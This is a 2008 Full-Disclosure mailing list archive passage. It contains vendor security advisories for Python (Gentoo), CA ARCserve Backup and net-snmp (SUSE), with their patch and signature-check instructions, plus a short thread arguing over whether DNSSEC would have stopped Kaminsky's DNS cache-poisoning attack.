From rbu at gentoo.org Fri Aug 1 00:33:28 2008 From: rbu at gentoo.org (Robert Buchholz) Date: Fri, 1 Aug 2008 01:33:28 +0200 Subject: [Full-disclosure] [ GLSA 200807-16 ] Python: Multiple vulnerabilities Message-ID: <200808010133.31885.rbu@gentoo.org> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200807-16 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Python: Multiple vulnerabilities Date: July 31, 2008 Bugs: #230640, #232137 ID: 200807-16 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities in Python may allow for the execution of arbitrary code. Background ========== Python is an interpreted, interactive, object-oriented programming language. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 dev-lang/python < 2.5.2-r6 *>= 2.4.4-r14 >= 2.5.2-r6 Description =========== Multiple vulnerabilities were discovered in Python: * David Remahl of Apple Product Security reported several integer overflows in core modules such as stringobject, unicodeobject, bufferobject, longobject, tupleobject, stropmodule, gcmodule, mmapmodule (CVE-2008-2315). * David Remahl of Apple Product Security also reported an integer overflow in the hashlib module, leading to unreliable cryptographic digest results (CVE-2008-2316). * Justin Ferguson reported multiple buffer overflows in unicode string processing that only affect 32bit systems (CVE-2008-3142). * The Google Security Team reported multiple integer overflows (CVE-2008-3143). * Justin Ferguson reported multiple integer underflows and overflows in the PyOS_vsnprintf() function, and an off-by-one error when passing zero-length strings, leading to memory corruption (CVE-2008-3144). Impact ====== A remote attacker could exploit these vulnerabilities in Python applications or daemons that pass user-controlled input to vulnerable functions. Exploitation might lead to the execution of arbitrary code or a Denial of Service. Vulnerabilities within the hashlib might lead to weakened cryptographic protection of data integrity or authenticity. Workaround ========== There is no known workaround at this time. Resolution ========== All Python 2.4 users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=dev-lang/python-2.4.4-r14" All Python 2.5 users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=dev-lang/python-2.5.2-r6" Please note that Python 2.3 is masked since June 24, and we will not be releasing updates to it. It will be removed from the tree in the near future. References ========== [ 1 ] CVE-2008-2315 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2315 [ 2 ] CVE-2008-2316 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2316 [ 3 ] CVE-2008-3142 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3142 [ 4 ] CVE-2008-3143 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3143 [ 5 ] CVE-2008-3144 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3144 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200807-16.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 835 bytes Desc: This is a digitally signed message part. Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080801/a5eefafb/attachment.bin From Everhart at gce.com Fri Aug 1 01:29:13 2008 From: Everhart at gce.com (Mary and Glenn Everhart) Date: Thu, 31 Jul 2008 20:29:13 -0400 Subject: [Full-disclosure] Re DNS spoofing issue discussion Message-ID: <489258D9.1090008@gce.com> To: Valdis.Kletnieks at vt.edu Subject: RE: [Full-disclosure] DNS spoofing issue. Thoughts on I chose my wording to cover not only DNSSEC but possible alternatives that could be devised. Certs are not the only way to do it, but it needs to be installed all over. The BGP fixes were devised after the last meltdown, but question again is whether they are installed. If DNSSEC had been installed, Kaminsky's issue would not exist. Since the number of sites running BGP among themselves is not that huge, it is probably not as practical an attack vector. Last meltdown that happened was said to be solved largely because most of the BGP site operators knew each other well enough to recognize voices on the phone. Net's bigger now tho. The fact that the recent youtube route hijack and the kenya routing insecurity incidents happened suggests that the md5 security is not in fact in place much (needs predefined secrets installed and apparently people don't configure it to do anything). That being the case, a reminder that maybe it could be good to reexamine this seems not totally daft. Glenn Everhart Everhart at gce.com (posting from home; I am the same one who has posted from work also.) -----Original Message----- From: Valdis.Kletnieks at vt.edu [mailto:Valdis.Kletnieks at vt.edu] Sent: Wednesday, July 30, 2008 11:30 AM To: Everhart, Glenn (Card Services) Cc: pschmehl_lists_nada at tx.rr.com; randallm at fidmail.com; full-disclosure at lists.grok.org.uk Subject: Re: [Full-disclosure] DNS spoofing issue. Thoughts on On Sun, 27 Jul 2008 14:07:03 EDT, Glenn.Everhart at ch.a.sx.com said: > The need for something more like ssl certs in there remains It's called DNSSEC, which has been out for a decade and more. > (Also needed for bgp I suspect). RFC2385 (TCP MD5 protection for BGP) addresses most of the issues, at least on a peer-to-peer basis, and has been out for a decade. There's a discussion of the issues in RFC5123. From don.bailey at gmail.com Fri Aug 1 04:17:00 2008 From: don.bailey at gmail.com (don bailey) Date: Thu, 31 Jul 2008 21:17:00 -0600 Subject: [Full-disclosure] Re DNS spoofing issue discussion In-Reply-To: <489258D9.1090008@gce.com> References: <489258D9.1090008@gce.com> Message-ID: <4892802C.2060801@gmail.com> > The BGP fixes were devised after the last meltdown, but question again > is whether they are installed. If DNSSEC had been installed, Kaminsky's > issue > would not exist. > That's probably not the case. It would only alter the scope of attack to include encryption and not simply port+xid. Since UDP is stateless one could could have theoretically kicked off some semblance of brute force attack against the key used for encryption. For algorithms that use bits larger than would be feasible for brute force attacks, the latest SNMPv3 vulnerability comes to mind, as does Tim Newsham's attack on WEP. In other words, there are always options. The attack wouldn't have gone away. As they say, there are 1,000,000 ways to get to Detroit. D From pschmehl_lists at tx.rr.com Fri Aug 1 04:37:20 2008 From: pschmehl_lists at tx.rr.com (Paul Schmehl) Date: Thu, 31 Jul 2008 22:37:20 -0500 Subject: [Full-disclosure] Re DNS spoofing issue discussion In-Reply-To: <4892802C.2060801@gmail.com> References: <489258D9.1090008@gce.com> <4892802C.2060801@gmail.com> Message-ID: <72B7D507D7C1A86FA3BB2333@Macintosh.local> --On July 31, 2008 9:17:00 PM -0600 don bailey wrote: >> The BGP fixes were devised after the last meltdown, but question again >> is whether they are installed. If DNSSEC had been installed, Kaminsky's >> issue >> would not exist. >> > > That's probably not the case. It would only alter the scope of > attack to include encryption and not simply port+xid. Since UDP > is stateless one could could have theoretically kicked off some > semblance of brute force attack against the key used for > encryption. For algorithms that use bits larger than would be > feasible for brute force attacks, the latest SNMPv3 vulnerability > comes to mind, as does Tim Newsham's attack on WEP. > > In other words, there are always options. The attack wouldn't have > gone away. As they say, there are 1,000,000 ways to get to Detroit. > Apples and oranges. *Attacks* will never go away, but dnssec, if fully implemented, would render Dan's attack moot. Unless you've factored 256 bit RSA keys, in which case you should be making six figures. Paul Schmehl If it isn't already obvious, my opinions are my own and not those of my employer. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pkcs7-signature Size: 3826 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080731/0a478ba4/attachment.bin From don.bailey at gmail.com Fri Aug 1 05:02:00 2008 From: don.bailey at gmail.com (don bailey) Date: Thu, 31 Jul 2008 22:02:00 -0600 Subject: [Full-disclosure] Re DNS spoofing issue discussion In-Reply-To: <72B7D507D7C1A86FA3BB2333@Macintosh.local> References: <489258D9.1090008@gce.com> <4892802C.2060801@gmail.com> <72B7D507D7C1A86FA3BB2333@Macintosh.local> Message-ID: <48928AB8.805@gmail.com> > Apples and oranges. *Attacks* will never go away, but dnssec, if fully > implemented, would render Dan's attack moot. Unless you've factored 256 > bit RSA keys, in which case you should be making six figures. > Maybe I wasn't being clear, Mr. Paul Schmehl. The static port vulnerability allows for the effective attack against the xid name space. So, there are really two attacks here. One is based on the fact that there are static ports, the other is based on the small number of bits used. Two problems. Compounded together. Into one attack. If there was a weakness in a particular implementation of DNSSEC that was made more feasible by the fact that people still used static ports, we would still be having a large hullabaloo about "attack, attack!!!". So, Mr. Paul Schmehl, it is not "apples and oranges". It is simply a different way of thinking. And how do you know I don't already make six figures? Don't you have a Red Hat image to install on a workstation somewhere? D From pschmehl_lists at tx.rr.com Fri Aug 1 05:28:32 2008 From: pschmehl_lists at tx.rr.com (Paul Schmehl) Date: Thu, 31 Jul 2008 23:28:32 -0500 Subject: [Full-disclosure] Re DNS spoofing issue discussion In-Reply-To: <48928AB8.805@gmail.com> References: <489258D9.1090008@gce.com> <4892802C.2060801@gmail.com> <72B7D507D7C1A86FA3BB2333@Macintosh.local> <48928AB8.805@gmail.com> Message-ID: --On July 31, 2008 10:02:00 PM -0600 don bailey wrote: > > And how do you know I don't already make six figures? Oh, that's easy. If you were making six figures, you wouldn't be posting in FD. > Don't you have a Red Hat image to install on a workstation somewhere? I hate RedHat. It's worse than Windows (and that's hard to do.) Paul Schmehl If it isn't already obvious, my opinions are my own and not those of my employer. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pkcs7-signature Size: 3826 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080731/e950f73e/attachment.bin From don.bailey at gmail.com Fri Aug 1 07:50:04 2008 From: don.bailey at gmail.com (don bailey) Date: Fri, 01 Aug 2008 00:50:04 -0600 Subject: [Full-disclosure] Re DNS spoofing issue discussion In-Reply-To: References: <489258D9.1090008@gce.com> <4892802C.2060801@gmail.com> <72B7D507D7C1A86FA3BB2333@Macintosh.local> <48928AB8.805@gmail.com> Message-ID: <4892B21C.70401@gmail.com> >> And how do you know I don't already make six figures? > > Oh, that's easy. If you were making six figures, you wouldn't be > posting in FD. > Sadly, I can't find a flaw in your logic. D From James.Williams at ca.com Fri Aug 1 11:52:54 2008 From: James.Williams at ca.com (Williams, James K) Date: Fri, 1 Aug 2008 06:52:54 -0400 Subject: [Full-disclosure] CA ARCserve Backup for Laptops and Desktops Server LGServer Service Vulnerability Message-ID: <649CDCB56C88AA458EFF2CBF494B620405315A2A@USILMS12.ca.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Title: CA ARCserve Backup for Laptops and Desktops Server LGServer Service Vulnerability CA Advisory Date: 2008-07-31 Reported By: Vulnerability Research Team of Assurent Secure Technologies, a TELUS Company Impact: A remote attacker can execute arbitrary code or cause a denial of service condition. Summary: CA ARCserve Backup for Laptops and Desktops server contains a vulnerability that can allow a remote attacker to execute arbitrary code or cause a denial of service condition. CA has issued updates to address the vulnerability. The vulnerability, CVE-2008-3175, occurs due to insufficient bounds checking by the LGServer service. An attacker can make a request that can result in arbitrary code execution or crash the service. Mitigating Factors: Only the server installation of BrightStor ARCserve Backup for Laptops and Desktops is affected. The client installation is not affected. Severity: CA has given this vulnerability a High risk rating. Affected Products: CA ARCserve Backup for Laptops and Desktops r11.5 CA ARCserve Backup for Laptops and Desktops r11.1 SP2 CA ARCserve Backup for Laptops and Desktops r11.1 SP1 CA ARCserve Backup for Laptops and Desktops r11.1 CA ARCserve Backup for Laptops and Desktops r11.0 CA Desktop Management Suite 11.2 CA Desktop Management Suite 11.1 CA Protection Suites r2 CA Protection Suites 3.0 CA Protection Suites 3.1 Affected Platforms: Windows Status and Recommendation: CA has provided the following updates to address the vulnerability. CA ARCserve Backup for Laptops and Desktops 11.1, 11.1 SP1, 11.1 SP2: Upgrade to 11.1 SP2 and apply RO00912. CA ARCserve Backup for Laptops and Desktops 11.5: RO00913. CA Protection Suites 3.0: RO00912. CA Protection Suites 3.1: RO00912. CA Desktop Management Suite 11.2: Upgrade to CA Desktop Management Suite 11.2 C1 and apply RO00913. CA Desktop Management Suite 11.1: RO01150. CA ARCserve Backup for Laptops and Desktops 11.0: Upgrade to ARCserve Backup for Laptops and Desktops version 11.1 SP2 and apply the latest patches. QI85497. Note: CA Protection Suites r2 includes CA ARCserve Backup for Laptops and Desktops 11.0. How to determine if you are affected: For Windows: 1. Using Windows Explorer, locate the file "rxRPC.dll". The file can be found in the following default locations: CA ARCserve Backup for Laptops and Desktops 11.5: C:\Program Files\CA\BrightStor ARCserve Backup for Laptops and Desktops\Server CA ARCserve Backup for Laptops and Desktops 11.1, 11.1 SP1, 11.1 SP2: C:\Program Files\CA\BrightStor ARCserve Backup for Laptops & Desktops\server CA Protection Suites 3.0: C:\Program Files\CA\BrightStor ARCserve Backup for Laptops & Desktops\server CA Protection Suites 3.1: C:\Program Files\CA\BrightStor ARCserve Backup for Laptops & Desktops\server CA Desktop Management Suite 11.2: C:\Program Files\CA\Unicenter DSM\BABLD\Server CA Desktop Management Suite 11.1: C:\Program Files\CA\Unicenter DSM\BABLD\Server 2. Right click on the file and select Properties. 3. Select the General tab. 4. If the file date is earlier than indicated in the below table, the installation is vulnerable. CA ARCserve Backup for Laptops and Desktops File Name File Size (bytes) File Date rxRPC.dll 131,072 June 11, 2008 CA ARCserve Backup for Laptops and Desktops 11.1, 11.1 SP1, 11.1 SP2 File Name File Size (bytes) File Date rxRPC.dll 114,688 June 11, 2008 CA Protection Suites 3.0 File Name File Size (bytes) File Date rxRPC.dll 114,688 June 11, 2008 CA Protection Suites 3.1 File Name File Size (bytes) File Date rxRPC.dll 114,688 June 11, 2008 CA Desktop Management Suite 11.2 File Name File Size (bytes) File Date rxRPC.dll 131,072 June 11, 2008 CA Desktop Management Suite 11.1 File Name File Size (bytes) File Date rxRPC.dll 122,880 June 11, 2008 Workaround: None References (URLs may wrap): CA Support: http://support.ca.com/ Security Notice for CA ARCserve Backup for Laptops and Desktops Server LGServer https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=181721 Solution Document Reference APARs: RO00912, RO00913, RO01150, QI85497 CA Security Response Blog posting: CA ARCserve Backup for Laptops and Desktops Server LGServer Service Vulnerability community.ca.com/blogs/casecurityresponseblog/archive/2008/08/01.aspx Reported By: Vulnerability Research Team of Assurent Secure Technologies, a TELUS Company. http://www.assurent.com/ CVE References: CVE-2008-3175 - LGServer buffer overflow http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3175 OSVDB References: Pending http://osvdb.org/ Changelog for this advisory: v1.0 - Initial Release Customers who require additional information should contact CA Technical Support at http://support.ca.com. For technical questions or comments related to this advisory, please send email to vuln AT ca DOT com. If you discover a vulnerability in CA products, please report your findings to our product security response team. https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177782 Regards, Ken Williams ; 0xE2941985 Director, CA Vulnerability Research CA, 1 CA Plaza, Islandia, NY 11749 Contact http://www.ca.com/us/contact/ Legal Notice http://www.ca.com/us/legal/ Privacy Policy http://www.ca.com/us/privacy/ Copyright (c) 2008 CA. All rights reserved. -----BEGIN PGP SIGNATURE----- Version: PGP Desktop 9.5.3 (Build 5003) wj8DBQFIkur9eSWR3+KUGYURAv1PAJ9c5YGVNiFI8NFPJPMtm/OYPt/yTACfZBF/ VHC6TzSRxGCcErezrWiYC4g= =Q62K -----END PGP SIGNATURE----- From thomas at suse.de Fri Aug 1 12:35:27 2008 From: thomas at suse.de (Thomas Biege) Date: Fri, 01 Aug 2008 13:35:27 +0200 Subject: [Full-disclosure] SUSE Security Announcement: net-snmp (SUSE-SA:2008:039) Message-ID: <4892f4ff.HIqez12FotScq3lj%thomas@suse.de> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ______________________________________________________________________________ SUSE Security Announcement Package: net-snmp Announcement ID: SUSE-SA:2008:039 Date: Fri, 01 Aug 2008 13:00:00 +0000 Affected Products: openSUSE 10.2 openSUSE 10.3 openSUSE 11.0 SUSE SLES 9 Novell Linux Desktop 9 Open Enterprise Server Novell Linux POS 9 SUSE Linux Enterprise Desktop 10 SP1 SLE SDK 10 SP1 SLE SDK 10 SP2 SUSE Linux Enterprise Server 10 SP1 SUSE Linux Enterprise Desktop 10 SP2 SUSE Linux Enterprise Server 10 SP2 Vulnerability Type: authentication bypass, denial-of-service Severity (1-10): 6 SUSE Default Package: no Cross-References: CVE-2008-0960 CVE-2008-2292 Content of This Advisory: 1) Security Vulnerability Resolved: - authentication bypass - denial-of-service Problem Description 2) Solution or Work-Around 3) Special Instructions and Notes 4) Package Location and Checksums 5) Pending Vulnerabilities, Solutions, and Work-Arounds: - viewvc/subversion 6) Authenticity Verification and Additional Information ______________________________________________________________________________ 1) Problem Description and Brief Discussion The net-snmp daemon implements the "simple network management protocol". The version 3 of SNMP as implemented in net-snmp uses the length of the HMAC in a packet to verify against a local HMAC for authentication. An attacker can therefore send a SNMPv3 packet with a one byte HMAC and guess the correct first byte of the local HMAC with 256 packets (max). Additionally a buffer overflow in perl-snmp was fixed that can cause a denial-of-service/crash. 2) Solution or Work-Around Please install the update package. 3) Special Instructions and Notes Please restart net-snmp after the update. 4) Package Location and Checksums The preferred method for installing security updates is to use the YaST Online Update (YOU) tool. YOU detects which updates are required and automatically performs the necessary steps to verify and install them. Alternatively, download the update packages for your distribution manually and verify their integrity by the methods listed in Section 6 of this announcement. Then install the packages using the command rpm -Fhv to apply the update, replacing with the filename of the downloaded RPM package. x86 Platform: openSUSE 11.0: http://download.opensuse.org/pub/opensuse/update/11.0/rpm/i586/libsnmp15-5.4.1-77.2.i586.rpm http://download.opensuse.org/pub/opensuse/update/11.0/rpm/i586/net-snmp-5.4.1-77.2.i586.rpm http://download.opensuse.org/pub/opensuse/update/11.0/rpm/i586/net-snmp-devel-5.4.1-77.2.i586.rpm http://download.opensuse.org/pub/opensuse/update/11.0/rpm/i586/perl-SNMP-5.4.1-77.2.i586.rpm http://download.opensuse.org/pub/opensuse/update/11.0/rpm/i586/snmp-mibs-5.4.1-77.2.i586.rpm openSUSE 10.3: http://download.opensuse.org/pub/opensuse/update/10.3/rpm/i586/libsnmp15-5.4.1-19.2.i586.rpm http://download.opensuse.org/pub/opensuse/update/10.3/rpm/i586/net-snmp-5.4.1-19.2.i586.rpm http://download.opensuse.org/pub/opensuse/update/10.3/rpm/i586/net-snmp-devel-5.4.1-19.2.i586.rpm http://download.opensuse.org/pub/opensuse/update/10.3/rpm/i586/perl-SNMP-5.4.1-19.2.i586.rpm http://download.opensuse.org/pub/opensuse/update/10.3/rpm/i586/snmp-mibs-5.4.1-19.2.i586.rpm openSUSE 10.2: ftp://ftp.suse.com/pub/suse/update/10.2/rpm/i586/net-snmp-5.4.rc2-8.i586.rpm ftp://ftp.suse.com/pub/suse/update/10.2/rpm/i586/net-snmp-devel-5.4.rc2-8.i586.rpm ftp://ftp.suse.com/pub/suse/update/10.2/rpm/i586/perl-SNMP-5.4.rc2-8.i586.rpm x86-64 Platform: openSUSE 11.0: http://download.opensuse.org/pub/opensuse/update/11.0/rpm/x86_64/net-snmp-32bit-5.4.1-77.2.x86_64.rpm openSUSE 10.3: http://download.opensuse.org/pub/opensuse/update/10.3/rpm/x86_64/net-snmp-32bit-5.4.1-19.2.x86_64.rpm openSUSE 10.2: ftp://ftp.suse.com/pub/suse/update/10.2/rpm/x86_64/net-snmp-32bit-5.4.rc2-8.x86_64.rpm Sources: openSUSE 11.0: http://download.opensuse.org/pub/opensuse/update/11.0/rpm/src/net-snmp-5.4.1-77.2.src.rpm openSUSE 10.3: http://download.opensuse.org/pub/opensuse/update/10.3/rpm/src/net-snmp-5.4.1-19.2.src.rpm openSUSE 10.2: ftp://ftp.suse.com/pub/suse/update/10.2/rpm/src/net-snmp-5.4.rc2-8.src.rpm Our maintenance customers are notified individually. The packages are offered for installation from the maintenance web: Open Enterprise Server http://download.novell.com/index.jsp?search=Search&keywords=71093bdfd49361f6dbe32a8fde43b848 Novell Linux POS 9 http://download.novell.com/index.jsp?search=Search&keywords=71093bdfd49361f6dbe32a8fde43b848 Novell Linux Desktop 9 http://download.novell.com/index.jsp?search=Search&keywords=71093bdfd49361f6dbe32a8fde43b848 SUSE Linux Enterprise Server 10 SP1 http://download.novell.com/index.jsp?search=Search&keywords=71093bdfd49361f6dbe32a8fde43b848 SUSE Linux Enterprise Server 10 SP2 http://download.novell.com/index.jsp?search=Search&keywords=71093bdfd49361f6dbe32a8fde43b848 SLE SDK 10 SP2 http://download.novell.com/index.jsp?search=Search&keywords=71093bdfd49361f6dbe32a8fde43b848 SLE SDK 10 SP1 http://download.novell.com/index.jsp?search=Search&keywords=71093bdfd49361f6dbe32a8fde43b848 SUSE Linux Enterprise Desktop 10 SP1 http://download.novell.com/index.jsp?search=Search&keywords=71093bdfd49361f6dbe32a8fde43b848 SUSE Linux Enterprise Desktop 10 SP2 http://download.novell.com/index.jsp?search=Search&keywords=71093bdfd49361f6dbe32a8fde43b848 SUSE SLES 9 http://download.novell.com/index.jsp?search=Search&keywords=71093bdfd49361f6dbe32a8fde43b848 ______________________________________________________________________________ 5) Pending Vulnerabilities, Solutions, and Work-Arounds: - viewvc/subversion This update of subversion fixes multiple vulnerabilities. - CVE-2008-1290: list CVS or SVN commits on "all-forbidden" files - CVE-2008-1291: directly access hidden CVSROOT folders - CVE-2008-1292: expose restricted content via the revision view, the log history, or the diff view ______________________________________________________________________________ 6) Authenticity Verification and Additional Information - Announcement authenticity verification: SUSE security announcements are published via mailing lists and on Web sites. The authenticity and integrity of a SUSE security announcement is guaranteed by a cryptographic signature in each announcement. All SUSE security announcements are published with a valid signature. To verify the signature of the announcement, save it as text into a file and run the command gpg --verify replacing with the name of the file where you saved the announcement. The output for a valid signature looks like: gpg: Signature made using RSA key ID 3D25D3D9 gpg: Good signature from "SuSE Security Team " where is replaced by the date the document was signed. If the security team's key is not contained in your key ring, you can import it from the first installation CD. To import the key, use the command gpg --import gpg-pubkey-3d25d3d9-36e12d04.asc - Package authenticity verification: SUSE update packages are available on many mirror FTP servers all over the world. While this service is considered valuable and important to the free and open source software community, the authenticity and the integrity of a package needs to be verified to ensure that it has not been tampered with. The internal rpm package signatures provide an easy way to verify the authenticity of an RPM package. Use the command rpm -v --checksig to verify the signature of the package, replacing with the filename of the RPM package downloaded. The package is unmodified if it contains a valid signature from build at suse.de with the key ID 9C800ACA. This key is automatically imported into the RPM database (on RPMv4-based distributions) and the gpg key ring of 'root' during installation. You can also find it on the first installation CD and at the end of this announcement. - SUSE runs two security mailing lists to which any interested party may subscribe: opensuse-security at opensuse.org - General Linux and SUSE security discussion. All SUSE security announcements are sent to this list. To subscribe, send an e-mail to . opensuse-security-announce at opensuse.org - SUSE's announce-only mailing list. Only SUSE's security announcements are sent to this list. To subscribe, send an e-mail to . ===================================================================== SUSE's security contact is or . The public key is listed below. ===================================================================== ______________________________________________________________________________ The information in this advisory may be distributed or reproduced, provided that the advisory is not modified in any way. In particular, the clear text signature should show proof of the authenticity of the text. SUSE Linux Products GmbH provides no warranties of any kind whatsoever with respect to the information contained in this security advisory. Type Bits/KeyID Date User ID pub 2048R/3D25D3D9 1999-03-06 SuSE Security Team pub 1024D/9C800ACA 2000-10-19 SuSE Package Signing Key - -----BEGIN PGP PUBLIC KEY BLOCK----- Version: GnuPG v1.4.2 (GNU/Linux) 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 